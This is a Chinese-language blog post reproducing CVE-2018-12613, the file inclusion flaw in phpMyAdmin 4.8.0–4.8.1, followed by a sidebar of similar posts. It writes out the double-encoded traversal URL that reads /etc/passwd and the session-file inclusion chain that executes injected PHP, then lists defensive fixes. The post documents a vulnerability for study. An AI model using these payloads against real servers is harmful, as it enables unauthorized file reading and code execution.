CVE-2018-12613 phpmyadmin 文件包含漏洞

已于 2024-06-02 22:22:56 修改
阅读量375 收藏 7
点赞数 3
分类专栏: 漏洞复现 文章标签: 网络安全
于 2024-05-31 14:58:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80697981/article/details/139352676
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

本地文件包含(LFI):当服务器开启 allow_url_include 选项时,就可以通过php的某些特性函数include()、require()、include_once()、require_once() 利用 url 去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。

远程代码执行,远程命令执行漏洞:用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。

影响版本

  • Phpmyadmin Phpmyadmin 4.8.0
  • Phpmyadmin Phpmyadmin 4.8.0.1
  • Phpmyadmin Phpmyadmin 4.8.1

漏洞复现

访问 http://your-ip:8080/index.php?target=db_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd

可见 /etc/passwd 被读取,说明文件包含漏洞存在。

在这里插入图片描述

利用方式

执行 select “<?php phpinfo();?>”

查看自己的sessionid(cookie中phpMyAdmin的值)

进行拼接命令,成功查看了phpinfo

index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_046be0a847fc1d5174c0daba20dc8005

在这里插入图片描述

防御措施

1.升级phpmyadmin版本

2.如果需要文件包含,应对包含的文件进行限制,使用白名单方式或设置可包含目录

3.对用户输入进行严格检查,参数中不允许出现…/之类的目录跳转符

4.严格检査include类的文件包含函数中的参数是否外界可控

xuxuxuxxxxx
关注
专栏目录
CVE-2018-12613 PHPmyadmin文件包含漏洞分析及漏洞利用
alert['Hello World']
11-20 4436
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固 漏洞描述    影响版本 漏洞环境搭建 漏洞分析 漏洞利用 漏洞加固
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613
qq_51577576的博客
10-06 713
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613 在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者还必须经过身份验证。
buuctf [PHPMYADMIN]CVE-2018-12613
qq_1873822的博客
03-16 723
phpMyAdmin版本信息:4.8.1 这里漏洞技术细节(涉及代码段、原理等)我上个链接 https://blog.csdn.net/jiyongx/article/details/105240498 任意文件包含 payload /index.php?target=tbl_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd 写入shell 第一种姿势 1、写入shell,测试语句: SELECT ‘<?php phpinfo()?>’ index.php?ta.
BUUCTF[PHPMYADMIN]CVE-2018-12613
qq_62078839的博客
04-24 2030
打开所提供的网址 是个phpmyadmin界面 phpmyadmin的版本号为4.8.1 在phpmyadmin的版本号为4.8.1以及4.8.0的版本中有着包含(查看并可能执行)服务器上的文件的漏洞,详情可看这篇文章 phpMyAdmin 是一套开源的、基于Web的MySQL数据库管理工具。在 4.8.2 之前的 phpMyAdmin 4.8.x 中发现了一个问题,其中攻击者可以在服务器上包含文件。该漏洞来自 phpMyAdmin 中重定向和加载页面的部分代码,以及对白名单页面的不当测试..
phpmyadmin 远程文件包含漏洞CVE-2018-12613
a1b2c3是弱口令
12-13 1537
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞漏洞记录 漏洞编号:CVE-2018-12613 受影响版本:phpMyAdmin 4.8.0和4.8.1受到影响。 利用条件: 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServ...
CVECVE-2018-12613:windows 复现 phpMyAdmin 本地文件包含造成远程代码执行漏洞
边扯边淡
11-24 1010
起序:在做 Web 题遇到的,复现一下。 一、靶场环境 VMware Workstation 15.5 Pro cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso phpStudy 2018 phpMyAdmin-4.8.1-all-languages 二、漏洞分析 1、本地文件包含 LFI(本地文件包含),是指当服务器开启 allow_url_include 选项时,就可以通过php的某些特性函数 include(),require()和inclu
CVE-2018-12613 PHPmyadmin文件包含漏洞
m0_48736242的博客
10-14 730
CVE-2018-12613 PHPmyadmin文件包含漏洞
CVE-2018-12613phpMyAdmin文件包含漏洞复现
顶峰
03-29 656
漏洞
CVE-2018-12613| phpmyadmin远程文件包含漏洞
星落的博客
12-09 445
影响范围 phpMyadmin 4.8.0 phpMyadmin 4.8.1 原打开index.php文件 分析50-63行代码 $target_blacklist = array ( 'import.php', 'export.php' ); // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($...
phpmyadmin-CVE-2018-12613复现
最新发布
chenyy95的博客
05-29 383
攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。
CVE-2018-12613 Phpmyadmin文件包含漏洞
weixin_51339377的博客
03-17 592
phpMyAdmin文件包含漏洞 利用条件: phpMyAdmin 4.8.0-4.8.1版本 用户已经拥有登录进入phpmyadmin后台的账号和密码 phpmyadmin配置文件位置 WWW\phpMyAdmin4.8.0\libraries\config.default.php 以下情况下攻击者在phpmyadmin中被重定向和加载,以及对白名单页面进行不正确的测试不需要身份验证: $cfg['AllowArbitraryServer']=true #攻击者可以指定.
CVE-2018-12613 PhpMyadmin后台文件包含分析
大方子
07-28 1186
2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的漏洞. 描述: 一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。 该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg ['AllowArbitraryServer'] = true:攻击者...
CVE-2018-12613Phpmyadmin后台 任意文件包含漏洞复现
weixin_55821558的博客
04-26 774
环境:php 5.5.30 工具:phpstudy(小皮面板) 这个漏洞是源于phpmyadmin中的index.php,下面是源码: 以上进行一下分析: 1.传入的target不能为空 2.必须是一个字符串 3.不能以index开头 4.不能再数组target_blacklist中 5.且经过checkPageValidit检查后为真 首先前三个都很好理解 我们先看一下第四个 黑名单为: 在index.php中,已经事先定义了target_blacklist的值,即import.php和ex
phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613)
weixin_63231007的博客
10-08 2848
_REQUEST['target'] 搜索数组$target_blacklist 中不存在指定的值( ‘import.php’, ‘export.php’)target=db_sql.php%253f/../../../../../../../../../../tmp/sess_[session]target=db_sql.php%253f../../../../../../../../flag 得到flag。$_REQUEST['target'] 参数携带的内容是字符串。
phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现
Senimo
12-11 1774
漏洞复现 phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 APP:phpMyAdmin 4.8.1 CVECVE-2018-12613 类型:远程文件包含 下载phpMyAdmin 4.8.1源码 漏洞问题出现在index.php页面55~63: // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_str
phpmyadmin(CVE-2018-12613)漏洞利用
hhiollk的博客
04-01 1419
1、漏洞描述 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg ...
GhostScript 沙箱绕过(命令执行)漏洞CVE-2018-16509)
黑白的博客
12-22 1297
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 复现过程 这里使用7.0.8版本 使
phpMyAdmin远程文件包含漏洞CVE-2018-12613深度分析
"phpmyadmin 远程文件包含漏洞CVE-2018-12613)" 本文将详细解析PHPMyAdmin中的远程文件包含漏洞CVE-2018-12613),这是一个严重影响该开源MySQL数据库管理工具安全性的漏洞PHPMyAdmin是一个广受欢迎的Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值